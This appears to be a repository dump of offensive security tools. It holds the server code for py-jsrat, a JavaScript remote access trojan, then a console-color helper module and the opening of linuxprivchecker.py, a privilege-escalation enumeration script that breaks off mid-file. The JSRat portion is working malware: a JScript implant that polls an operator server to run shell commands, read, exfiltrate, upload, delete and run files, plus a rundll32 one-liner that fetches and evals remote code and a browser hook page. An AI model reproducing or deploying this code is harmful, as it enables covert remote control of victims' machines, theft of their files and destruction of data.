76 | """ 77 | jsrat_code = """ 78 | while(true) { 79 | h = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 80 | h.SetTimeouts(0, 0, 0, 0); 81 | try { 82 | h.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 83 | h.Send(); 84 | c = h.ResponseText; 85 | if(c=="delete") { 86 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 87 | p.SetTimeouts(0, 0, 0, 0); 88 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 89 | p.Send("[Next Input should be the File to Delete]"); 90 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 91 | g.SetTimeouts(0, 0, 0, 0); 92 | g.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 93 | g.Send(); 94 | d = g.ResponseText; 95 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 96 | f =fso1.GetFile(d); 97 | f.Delete(); 98 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 99 | p.SetTimeouts(0, 0, 0, 0); 100 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 101 | p.Send("[Delete Success]\\n"); 102 | continue; 103 | } else if(c=="download") { 104 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 105 | p.SetTimeouts(0, 0, 0, 0); 106 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 107 | p.Send("[Next Input should be the File to download]"); 108 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 109 | g.SetTimeouts(0, 0, 0, 0); 110 | g.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 111 | g.Send(); 112 | d = g.ResponseText; 113 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 114 | f=fso1.OpenTextFile(d,1); 115 | g=f.ReadAll(); 116 | f.Close(); 117 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 118 | p.SetTimeouts(0, 0, 0, 0); 119 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/download",false); 120 | p.Send(g); 121 | continue; 122 | } else if(c=="read") { 123 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 124 | p.SetTimeouts(0, 0, 0, 0); 125 | 
p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 126 | p.Send("[Next Input should be the File to Read]"); 127 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 128 | g.SetTimeouts(0, 0, 0, 0); 129 | g.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 130 | g.Send(); 131 | d = g.ResponseText; 132 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 133 | f=fso1.OpenTextFile(d,1); 134 | g=f.ReadAll(); 135 | f.Close(); 136 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 137 | p.SetTimeouts(0, 0, 0, 0); 138 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 139 | p.Send(g + "\\n"); 140 | continue; 141 | } else if(c=="run") { 142 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 143 | p.SetTimeouts(0, 0, 0, 0); 144 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 145 | p.Send("[Next Input should be the File to Run]"); 146 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 147 | g.SetTimeouts(0, 0, 0, 0); 148 | g.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 149 | g.Send(); 150 | d = g.ResponseText; 151 | r = new ActiveXObject("WScript.Shell").Run(d,0,true); 152 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 153 | p.SetTimeouts(0, 0, 0, 0); 154 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 155 | p.Send("[Run Success]\\n"); 156 | continue; 157 | } else if(c=="upload") { 158 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 159 | p.SetTimeouts(0, 0, 0, 0); 160 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 161 | p.Send("[Start to Upload]"); 162 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 163 | g.SetTimeouts(0, 0, 0, 0); 164 | g.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/uploadpath",false); 165 | g.Send(); 166 | dpath = g.ResponseText; 167 | g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 168 | g2.SetTimeouts(0, 0, 0, 0); 169 | 
g2.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/uploaddata",false); 170 | g2.Send(); 171 | ddata = g2.ResponseText; 172 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 173 | f=fso1.CreateTextFile(dpath,true); 174 | f.WriteLine(ddata); 175 | f.Close(); 176 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 177 | p.SetTimeouts(0, 0, 0, 0); 178 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 179 | p.Send("[Upload Success]\\n"); 180 | continue; 181 | } else { 182 | r = new ActiveXObject("WScript.Shell").Exec(c); 183 | var so; 184 | while(!r.StdOut.AtEndOfStream){so=r.StdOut.ReadAll()} 185 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 186 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 187 | p.Send(so + "\\n"); 188 | } 189 | } catch(e1) { 190 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 191 | p.SetTimeouts(0, 0, 0, 0); 192 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 193 | p.Send("[ERROR - No Output]\\n"); 194 | } 195 | } 196 | """ 197 | return jsrat_code; 198 | 199 | 200 | def print_jsrat_help(): 201 | """ 202 | Displays JSRat options for Server operator to interact w/Client||Victim 203 | """ 204 | print 205 | print white(underline("JSRat Usage Options:")); 206 | print green(" CMD") + white(" => ") + green("Executes Provided Command"); 207 | print green(" run") + white(" => ") + green("Run EXE or Script"); 208 | print green(" read") + white(" => ") + green("Read File"); 209 | print green(" upload") + white(" => ") + green("Upload File"); 210 | print green(" download") + white(" => ") + green("Download File"); 211 | print green(" delete") + white(" => ") + green("Delete File"); 212 | print green(" help") + white(" => ") + green("Help Menu"); 213 | print green(" exit") + white(" => ") + green("Exit Shell"); 214 | print 215 | 216 | 217 | def get_user_input(): 218 | while True: 219 | usr_input = 
raw_input(red("$")+white("(")+blue("JSRat")+white(")")+red(">")+white(" ")); 220 | if usr_input.strip() != "": 221 | break 222 | else: 223 | print 224 | return usr_input.strip(); 225 | 226 | 227 | class myHandler(BaseHTTPRequestHandler): 228 | """ 229 | Custom handler so we can control how different web requests are processed 230 | Crude setup I threw together, but it works so get over it... 231 | """ 232 | js_load_path = '/connect' # Base URL path to initialize things (value is overridden at server start) 233 | upload_path = ""; # static so we can set/get as needed, since this isnt powershell... 234 | time_to_stop = False; 235 | 236 | def log_message(self, format, *args): 237 | """ Custom Log Handler to Spit out on to stderr """ 238 | return 239 | 240 | def do_GET(self): 241 | """ 242 | Handle any GET requests coming into our server 243 | """ 244 | content_type = "text/plain"; 245 | response_message = jsrat(); 246 | if self.js_load_path == self.path: 247 | good("Incoming JSRat Client: %s" % str(self.client_address[0])); 248 | if 'user-agent' in self.headers.keys() and self.headers['user-agent'].strip() != "": 249 | pad(); good("User-Agent: %s" % self.headers['User-Agent']) 250 | print_jsrat_help(); 251 | 252 | elif "/rat" == self.path: 253 | # Get input from server operator on what to do next... 
254 | response_message = get_user_input(); 255 | if response_message.strip().lower() == "help": 256 | print_jsrat_help() 257 | while True: 258 | response_message = get_user_input(); 259 | if response_message.strip().lower() != "help": 260 | break 261 | else: 262 | print 263 | elif response_message.strip().lower() == "exit": 264 | print; caution("OK, sending kill command to Client...") 265 | response_message = "cmd /c taskkill /f /im rundll32.exe"; 266 | pad(); caution("Hit CTRL+C to kill server....") 267 | 268 | elif "/uploadpath" == self.path: 269 | lpath = raw_input(red("$")+white("(")+blue("Enter Full Path for Local File to Upload")+white(")")+red(">")+white(" ")); 270 | myHandler.upload_path = lpath; 271 | caution("Setting local upload path to: %s" % myHandler.upload_path) 272 | destination_path = raw_input(red("$")+white("(")+blue("Enter Remote Path to Write Uploaded Content")+white(")")+red(">")+white(" ")); 273 | response_message = destination_path.strip(); 274 | 275 | elif "/uploaddata" == self.path: 276 | response_message = open(myHandler.upload_path, 'rb+').read(); 277 | myHandler.upload_path = ""; 278 | 279 | elif "/hook" == self.path: 280 | good("Hooking Client: %s" % str(self.client_address[0])); 281 | content_type = "text/html"; 282 | response_message = jsrat(); 283 | response_message = """ 284 | 285 | 286 | new document 287 | 288 | 289 | 290 | 291 | 292 | 293 | 300 | 301 | """ 302 | 303 | elif "/wtf" == self.path: 304 | good("Client Command Query from: %s" % str(self.client_address[0])); 305 | response_message = """ 306 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://"""+bind_ip+":"+str(listener_port)+srv_url+"""",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}""" 307 | print cyan(response_message + "\n"); 308 | 309 | # Send the built response back to 
client 310 | self.send_response(200); 311 | self.send_header('Content-type',content_type); 312 | self.end_headers(); 313 | self.wfile.write(response_message); 314 | 315 | 316 | def do_POST(self): 317 | """ 318 | Handle any POST requests coming into our server 319 | """ 320 | if "/rat" == self.path: 321 | content_len = int(self.headers.getheader('content-length', 0)) 322 | post_body = self.rfile.read(content_len) 323 | print cyan(post_body); 324 | if post_body == "[No Output]": 325 | print 326 | self.send_response(200); 327 | self.send_header('Content-type','text/plain'); 328 | self.end_headers(); 329 | 330 | elif "/download" == self.path: 331 | content_len = int(self.headers.getheader('content-length', 0)) 332 | post_body = self.rfile.read(content_len) 333 | fname = raw_input(red("$")+white("(")+blue("Enter Filename to Save in ./loot/")+white(")")+red(">")+white(" ")); 334 | try: 335 | loot_file = outdir.strip()+fname.strip(); 336 | fh = open(loot_file, 'wb+') 337 | fh.write(post_body) 338 | fh.close() 339 | pad(); good("Successfully Saved To: %s\n" % loot_file.replace(home, "./")) 340 | except Exception, e: 341 | error("Problem saving content to:") 342 | pad(); bad("%s" % loot_file.replace(home, "./")) 343 | pad(); pad(); bad(str(e)); 344 | self.send_response(200); 345 | self.send_header('Content-type','text/plain'); 346 | self.end_headers(); 347 | else: 348 | caution("%s - Snooper detected..." 
% str(self.client_address[0])); 349 | pad(); caution("=> %s" % self.path); 350 | self.send_error(404); 351 | 352 | 353 | def main(): 354 | """ 355 | Establish our base web server and initiate the event loop to drive things 356 | 357 | 1 - Overrides custom handler path for URL to initiate things 358 | 2 - Binds socket to ip and port, and then maps to our custom handler 359 | 3 - Starts endless event loop & pass off for myHandler to handle requests 360 | """ 361 | try: 362 | print 363 | global httpd; 364 | myHandler.js_load_path = srv_url; 365 | httpd = SocketServer.TCPServer((bind_ip, listener_port), myHandler); 366 | status("Web Server Started on Port: %d" % listener_port); 367 | status("Awaiting Client Connection to: http://%s:%s%s" % (bind_ip, listener_port, srv_url)); 368 | pad(); status("Client Command at: http://%s:%s/wtf" % (bind_ip, listener_port)); 369 | pad(); status("Browser Hook Set at: http://%s:%s/hook\n" % (bind_ip, listener_port)); 370 | caution("Hit CTRL+C to Stop the Server at any time...\n"); 371 | httpd.serve_forever(); 372 | except socket.error, e: 373 | error('Try again in 30 seconds or so...') 374 | pad(); bad('Socket Error:\n\t%s\n' % e) 375 | except KeyboardInterrupt: 376 | print '' 377 | error("CTRL+C Interupt Detected!"); 378 | pad(); bad("Shutting Down Web Server...\n"); 379 | httpd.shutdown; 380 | 381 | 382 | 383 | # Parse Arguments/Options 384 | parser = optparse.OptionParser(banner(), version="%prog v0.01b"); 385 | parser.add_option("-i", "--ip", dest="ip", default=None, type="string", help="IP to Bind Server to (i.e. 
192.168.0.69)"); 386 | parser.add_option("-p", "--port", dest="port", default=None, type="int", help="Port to Run Server on"); 387 | parser.add_option("-u", "--url", dest="url", default="/connect", type="string", help="URL to Initiate Client Connection (default: /connect)"); 388 | parser.add_option("-f", "--find-ip", action="count", default=0, dest="fip", help="Display Current Internal and External IP Addresses"); 389 | parser.add_option("-v", action="count", default=0, dest="verbose", help="Enable Verbose Output"); 390 | (options, args) = parser.parse_args(); 391 | 392 | # Make sure we got necessary arguments 393 | args = sys.argv[1:]; 394 | if not args: 395 | print ""; 396 | parser.print_help(); 397 | print; 398 | sys.exit(); 399 | 400 | if options.fip: 401 | print; status("Checking IP....") 402 | good("Internal IP: %s" % internal_ip()) 403 | good("External IP: %s\n\n" % external_ip()) 404 | sys.exit(); 405 | 406 | # Establish IP to bind our web server to (i.e. 127.0.0.1||192.168.0.69||10.10.10.10) 407 | if args and options.ip == None: 408 | print ' '; 409 | error("Missing Argument: --ip IP"); 410 | sys.stdout.write(' '); 411 | error("You need to provide the IP to bind server to!\n"); 412 | parser.print_help(); 413 | print; 414 | sys.exit(); 415 | else: 416 | bind_ip = options.ip; 417 | 418 | # Establish listner port for our web server (privs needed for low ports < 1024) 419 | if args and options.port == None: 420 | print ' '; 421 | error("Missing Argument: --port PORTNUMBER"); 422 | sys.stdout.write(' '); 423 | error("You need to provide the port to listen on!\n"); 424 | parser.print_help(); 425 | print; 426 | sys.exit(); 427 | else: 428 | listener_port = options.port; 429 | 430 | # Establish system based file seperator 431 | if os.name == 'nt' or sys.platform.startswith('win'): 432 | delimiter = "\\"; 433 | else: 434 | delimiter = "/"; 435 | 436 | srv_url = options.url; # The URL path to start client initiation on 437 | verbose = options.verbose; # Enable 
verbose output for debugging purposes 438 | home = os.path.dirname(os.path.abspath(__file__)) + delimiter; # Home dir 439 | outdir = home + "loot" + delimiter; # Output directory to save content 440 | if not os.path.isfile(outdir) and not os.path.isdir(outdir): 441 | os.mkdir(outdir); # Create output directory if it doesn't exist 442 | 443 | 444 | # Time for the magic show 445 | if __name__ == "__main__": 446 | try: 447 | main(); 448 | 449 | except KeyboardInterrupt: 450 | print "\n"; 451 | print red("[") + white("WARNING") + red("]") + white(" CTRL+C, closing session...\n\n"); 452 | sys.exit(); 453 | -------------------------------------------------------------------------------- /javascript-backdoor/py-jsrat/classes/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /javascript-backdoor/py-jsrat/classes/colors.py: -------------------------------------------------------------------------------- 1 | # 2 | # colors.py 3 | # 4 | # Color Code Functions in Python 5 | # Works on Winblows or *nix 6 | # 7 | # By: torBot 8 | # 9 | # Use it like a module & import the available functions, then call as you like: 10 | # from colors import * 11 | # status("This is a status message") 12 | # pad(); print red("This is red text") 13 | # pad(); print blue("This is blue text\n") 14 | # caution("Cautionary Message") 15 | # pad() 16 | # error("This is an error message\n\n") 17 | # 18 | 19 | import os, sys 20 | from ctypes import Structure, c_short, c_ushort, byref 21 | 22 | if os.name == 'nt' or sys.platform.startswith('win'): 23 | from ctypes import windll, Structure, c_short, c_ushort, byref 24 | 25 | # Winblows Constants 26 | ################################ 27 | SHORT = c_short 28 | WORD = c_ushort 29 | 30 | # winbase.h 31 | STD_INPUT_HANDLE = -10 32 | STD_OUTPUT_HANDLE = -11 33 | STD_ERROR_HANDLE = -12 34 | 35 | # wincon.h structs 36 | class 
COORD(Structure): 37 | _fields_ = [ ("X", SHORT), ("Y", SHORT)] 38 | 39 | class SMALL_RECT(Structure): 40 | _fields_ = [("Left", SHORT), ("Top", SHORT), 41 | ("Right", SHORT), ("Bottom", SHORT)] 42 | 43 | class CONSOLE_SCREEN_BUFFER_INFO(Structure): 44 | _fields_ = [ 45 | ("dwSize", COORD), ("dwCursorPosition", COORD), 46 | ("wAttributes", WORD), ("srWindow", SMALL_RECT), 47 | ("dwMaximumWindowSize", COORD)] 48 | 49 | 50 | # OS Color Definitions & Setup 51 | ################################ 52 | if os.name == 'nt' or sys.platform.startswith('win'): 53 | stdout_handle = windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE) 54 | SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute 55 | GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo 56 | 57 | # wincon.h 58 | DIM = 0x00 # dim 59 | RS = "" # reset (?) 60 | HC = 0x08 # hicolor 61 | BHC = 0x80 # background hicolor 62 | UL = "" # underline (no workie on winblows) 63 | INV = "" # inverse background and foreground (no workie on winblows) 64 | FBLK = 0x0000 # foreground black 65 | FBLK = 0x0008 # foreground grey 66 | FRED = 0x0004 # foreground red 67 | FGRN = 0x0002 # foreground green 68 | FYEL = 0x0006 # foreground yellow 69 | FBLU = 0x0001 # foreground blue 70 | FMAG = 0x0005 # foreground magenta 71 | FCYN = 0x0003 # foreground cyan 72 | FWHT = 0x0007 # foreground white (grey) 73 | BBLK = 0x0000 # background black 74 | BBLK = 0x0080 # background grey 75 | BRED = 0x0040 # background red 76 | BGRN = 0x0020 # background green 77 | BYEL = 0x0060 # background yellow 78 | BBLU = 0x0010 # background blue 79 | BMAG = 0x0050 # background magenta 80 | BCYN = 0x0030 # background cyan 81 | BWHT = 0x0070 # background white (grey) 82 | else: 83 | # ANSI color code escapes, for *nix 84 | DIM = "" # dim (no workie) 85 | RS="\033[0m" # reset 86 | HC="\033[1m" # hicolor 87 | UL="\033[4m" # underline 88 | INV="\033[7m" # inverse background and foreground 89 | FBLK="\033[30m" # foreground black 90 | 
FRED="\033[31m" # foreground red 91 | FGRN="\033[32m" # foreground green 92 | FYEL="\033[33m" # foreground yellow 93 | FBLU="\033[34m" # foreground blue 94 | FMAG="\033[35m" # foreground magenta 95 | FCYN="\033[36m" # foreground cyan 96 | FWHT="\033[37m" # foreground white 97 | BBLK="\033[40m" # background black 98 | BRED="\033[41m" # background red 99 | BGRN="\033[42m" # background green 100 | BYEL="\033[43m" # background yellow 101 | BBLU="\033[44m" # background blue 102 | BMAG="\033[45m" # background magenta 103 | BCYN="\033[46m" # background cyan 104 | BWHT="\033[47m" # background white 105 | 106 | def get_text_attr(): 107 | """ 108 | Returns the character attributes (colors) of the console screen buffer. 109 | 110 | Used for windows only 111 | """ 112 | if os.name == 'nt' or sys.platform.startswith('win'): 113 | try: 114 | csbi = CONSOLE_SCREEN_BUFFER_INFO() 115 | GetConsoleScreenBufferInfo(stdout_handle, byref(csbi)) 116 | return csbi.wAttributes 117 | except Exception, e: 118 | pass 119 | return None 120 | 121 | 122 | def set_text_attr(color): 123 | """ 124 | Sets the character attributes (colors) of the console screen 125 | buffer. Color is a combination of foreground and background color, 126 | foreground and background intensity. 
127 | 128 | Used for windows only 129 | """ 130 | if os.name == 'nt' or sys.platform.startswith('win'): 131 | try: 132 | SetConsoleTextAttribute(stdout_handle, color) 133 | return True 134 | except Exception, e: 135 | pass 136 | return False 137 | 138 | 139 | def windows_default_colors(): 140 | """ 141 | Checks and returns the current windows console color mapping 142 | Returns the necessary foreground and background code to reset later 143 | 144 | Used for windows only 145 | """ 146 | if os.name == 'nt' or sys.platform.startswith('win'): 147 | try: 148 | default_colors = get_text_attr() 149 | default_bg = default_colors & 0x0070 150 | return default_bg 151 | except Exception, e: 152 | pass 153 | return None 154 | 155 | 156 | def restore_windows_colors(default_gb): 157 | """ 158 | Set or Restore the console colors to the provided foreground + background codes 159 | Returns True or False 160 | 161 | Used for windows only 162 | """ 163 | if os.name == 'nt' or sys.platform.startswith('win'): 164 | try: 165 | set_text_attr(default_gb) 166 | return True 167 | except Exception, e: 168 | pass 169 | return False 170 | 171 | 172 | # Some Simple Print functions 173 | ############################# 174 | def pad(): 175 | """ Simple pad to make sub points easier to print """ 176 | sys.stdout.write(' ') 177 | 178 | def caution(msg): 179 | """ [*] Print a cautionary message to user """ 180 | if os.name == 'nt' or sys.platform.startswith('win'): 181 | windows_user_default_color_code = windows_default_colors() 182 | set_text_attr(FYEL | BBLK | HC | BHC) 183 | sys.stdout.write("[") 184 | set_text_attr(FWHT | BBLK | HC | BHC) 185 | sys.stdout.write("*") 186 | set_text_attr(FYEL | BBLK | HC | BHC) 187 | sys.stdout.write("] ") 188 | set_text_attr(FWHT | BBLK | HC | BHC) 189 | sys.stdout.write(str(msg) + "\n") 190 | restore_windows_colors(windows_user_default_color_code) 191 | else: 192 | print HC + FYEL + "[" + FWHT + "-" + FYEL + "] " + FWHT + str( msg ) + RS 193 | 194 | 195 | def 
good( msg ): 196 | """ [*] Print a success message to user """ 197 | if os.name == 'nt' or sys.platform.startswith('win'): 198 | windows_user_default_color_code = windows_default_colors() 199 | set_text_attr(FGRN | BBLK | HC | BHC) 200 | sys.stdout.write("[") 201 | set_text_attr(FWHT | BBLK | HC | BHC) 202 | sys.stdout.write("*") 203 | set_text_attr(FGRN | BBLK | HC | BHC) 204 | sys.stdout.write("] ") 205 | set_text_attr(FWHT | BBLK | HC | BHC) 206 | sys.stdout.write(str(msg) + "\n") 207 | restore_windows_colors(windows_user_default_color_code) 208 | else: 209 | print HC + FGRN + "[" + FWHT + "*" + FGRN + "] " + FWHT + str( msg ) + RS 210 | 211 | 212 | def bad( msg ): 213 | """ [x] Print a warning or bad message to user """ 214 | if os.name == 'nt' or sys.platform.startswith('win'): 215 | windows_user_default_color_code = windows_default_colors() 216 | set_text_attr(FRED | BBLK | HC | BHC) 217 | sys.stdout.write("[") 218 | set_text_attr(FWHT | BBLK | HC | BHC) 219 | sys.stdout.write("x") 220 | set_text_attr(FRED | BBLK | HC | BHC) 221 | sys.stdout.write("] ") 222 | set_text_attr(FWHT | BBLK | HC | BHC) 223 | sys.stdout.write(str(msg) + "\n") 224 | restore_windows_colors(windows_user_default_color_code) 225 | else: 226 | print HC + FRED + "[" + FWHT + "x" + FRED + "] " + FWHT + str( msg ) + RS 227 | 228 | 229 | def status(msg ): 230 | """ [*] Print a status message to user """ 231 | if os.name == 'nt' or sys.platform.startswith('win'): 232 | windows_user_default_color_code = windows_default_colors() 233 | set_text_attr(FBLU | BBLK | HC | BHC) 234 | sys.stdout.write("[") 235 | set_text_attr(FWHT | BBLK | HC | BHC) 236 | sys.stdout.write("*") 237 | set_text_attr(FBLU | BBLK | HC | BHC) 238 | sys.stdout.write("] ") 239 | set_text_attr(FWHT | BBLK | HC | BHC) 240 | sys.stdout.write(str(msg) + "\n") 241 | restore_windows_colors(windows_user_default_color_code) 242 | else: 243 | print HC + FBLU + "[" + FWHT + "*" + FBLU + "] " + FWHT + str( msg ) + RS 244 | 245 | 246 | 
def error( msg ): 247 | """ [ERROR] Print an ERROR message to user """ 248 | if os.name == 'nt' or sys.platform.startswith('win'): 249 | windows_user_default_color_code = windows_default_colors() 250 | set_text_attr(FRED | BBLK | HC | BHC) 251 | sys.stdout.write("[") 252 | set_text_attr(FWHT | BBLK | HC | BHC) 253 | sys.stdout.write("ERROR") 254 | set_text_attr(FRED | BBLK | HC | BHC) 255 | sys.stdout.write("] ") 256 | set_text_attr(FWHT | BBLK | HC | BHC) 257 | sys.stdout.write(str(msg) + "\n") 258 | restore_windows_colors(windows_user_default_color_code) 259 | else: 260 | print HC + FRED + "[" + FWHT + "ERROR" + FRED + "] " + FWHT + str( msg ) + RS 261 | 262 | 263 | def underline( msg ): 264 | """ Underline message string (no workie on windows) """ 265 | if os.name == 'nt' or sys.platform.startswith('win'): 266 | return str(msg) 267 | return UL + str(msg) + RS 268 | 269 | 270 | # General Colorize Text Wrappers 271 | ################################ 272 | def blue( msg ): 273 | """ Print BLUE Colored String """ 274 | if os.name == 'nt' or sys.platform.startswith('win'): 275 | windows_user_default_color_code = windows_default_colors() 276 | set_text_attr(FBLU | BBLK | HC | BHC) 277 | sys.stdout.write(str(msg)) 278 | restore_windows_colors(windows_user_default_color_code) 279 | else: 280 | return HC + FBLU + str(msg) + RS 281 | 282 | 283 | def cyan( msg ): 284 | """ Print CYAN Colored String """ 285 | if os.name == 'nt' or sys.platform.startswith('win'): 286 | windows_user_default_color_code = windows_default_colors() 287 | set_text_attr(FCYN | BBLK | HC | BHC) 288 | sys.stdout.write(str(msg)) 289 | restore_windows_colors(windows_user_default_color_code) 290 | else: 291 | return HC + FCYN + str(msg) + RS 292 | 293 | 294 | def green( msg ): 295 | """ Print GREEN Colored String """ 296 | if os.name == 'nt' or sys.platform.startswith('win'): 297 | windows_user_default_color_code = windows_default_colors() 298 | set_text_attr(FGRN | BBLK | HC | BHC) 299 | 
sys.stdout.write(str(msg)) 300 | restore_windows_colors(windows_user_default_color_code) 301 | else: 302 | return HC + FGRN + str(msg) + RS 303 | 304 | def magenta(msg): 305 | """ Print MAGENTA Colored String """ 306 | if os.name == 'nt' or sys.platform.startswith('win'): 307 | windows_user_default_color_code = windows_default_colors() 308 | set_text_attr(FMAG | BBLK | HC | BHC) 309 | sys.stdout.write(str(msg)) 310 | restore_windows_colors(windows_user_default_color_code) 311 | else: 312 | return HC + FMAG + str(msg) + RS 313 | 314 | 315 | def red( msg ): 316 | """ Print RED Colored String """ 317 | if os.name == 'nt' or sys.platform.startswith('win'): 318 | windows_user_default_color_code = windows_default_colors() 319 | set_text_attr(FRED | BBLK | HC | BHC) 320 | sys.stdout.write(str(msg)) 321 | restore_windows_colors(windows_user_default_color_code) 322 | else: 323 | return HC + FRED + str(msg) + RS 324 | 325 | 326 | def white( msg ): 327 | """ Print WHITE Colored String """ 328 | if os.name == 'nt' or sys.platform.startswith('win'): 329 | windows_user_default_color_code = windows_default_colors() 330 | set_text_attr(FWHT | BBLK | HC | BHC) 331 | sys.stdout.write(str(msg)) 332 | restore_windows_colors(windows_user_default_color_code) 333 | else: 334 | return HC + FWHT + str(msg) + RS 335 | 336 | 337 | def yellow(msg ): 338 | """ Print YELLOW Colored String """ 339 | if os.name == 'nt' or sys.platform.startswith('win'): 340 | windows_user_default_color_code = windows_default_colors() 341 | set_text_attr(FYEL | BBLK | HC | BHC) 342 | sys.stdout.write(str(msg)) 343 | restore_windows_colors(windows_user_default_color_code) 344 | else: 345 | return HC + FYEL + str(msg) + RS 346 | -------------------------------------------------------------------------------- /linuxprivchecker.py: -------------------------------------------------------------------------------- 1 | #!/usr/env python 2 | 3 | 
############################################################################################################### 4 | ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script 5 | ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift 6 | ##------------------------------------------------------------------------------------------------------------- 7 | ## [Details]: 8 | ## This script is intended to be executed locally on a Linux box to enumerate basic system info and 9 | ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text 10 | ## passwords and applicable exploits. 11 | ##------------------------------------------------------------------------------------------------------------- 12 | ## [Warning]: 13 | ## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates, 14 | ## I did not write it to be efficient and in some cases you may find the functions may not produce the desired 15 | ## results. For example, the function that links packages to running processes is based on keywords and will 16 | ## not always be accurate. Also, the exploit list included in this function will need to be updated over time. 17 | ## Feel free to change or improve it any way you see fit. 18 | ##------------------------------------------------------------------------------------------------------------- 19 | ## [Modification, Distribution, and Attribution]: 20 | ## You are free to modify and/or distribute this script as you wish. 
I only ask that you maintain original 21 | ## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's 22 | ## worth anything anyway :) 23 | ############################################################################################################### 24 | 25 | # conditional import for older versions of python not compatible with subprocess 26 | try: 27 | import subprocess as sub 28 | compatmode = 0 # newer version of python, no need for compatibility mode 29 | except ImportError: 30 | import os # older version of python, need to use os instead 31 | compatmode = 1 32 | 33 | # title / formatting 34 | bigline = "=================================================================================================" 35 | smlline = "-------------------------------------------------------------------------------------------------" 36 | 37 | print bigline 38 | print "LINUX PRIVILEGE ESCALATION CHECKER" 39 | print bigline 40 | print 41 | 42 | # loop through dictionary, execute the commands, store the results, return updated dict 43 | def execCmd(cmdDict): 44 | for item in cmdDict: 45 | cmd = cmdDict[item]["cmd"] 46 | if compatmode == 0: # newer version of python, use preferred subprocess 47 | out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate() 48 | results = out.split('\n') 49 | else: # older version of python, use os.popen 50 | echo_stdout = os.popen(cmd, 'r') 51 | results = echo_stdout.read().split('\n') 52 | cmdDict[item]["results"]=results 53 | return cmdDict 54 | 55 | # print results for each previously executed command, no return value 56 | def printResults(cmdDict): 57 | for item in cmdDict: 58 | msg = cmdDict[item]["msg"] 59 | results = cmdDict[item]["results"] 60 | print "[+] " + msg 61 | for result in results: 62 | if result.strip() != "": 63 | print " " + result.strip() 64 | print 65 | return 66 | 67 | def writeResults(msg, results): 68 | f = open("privcheckout.txt", "a"); 69 | 
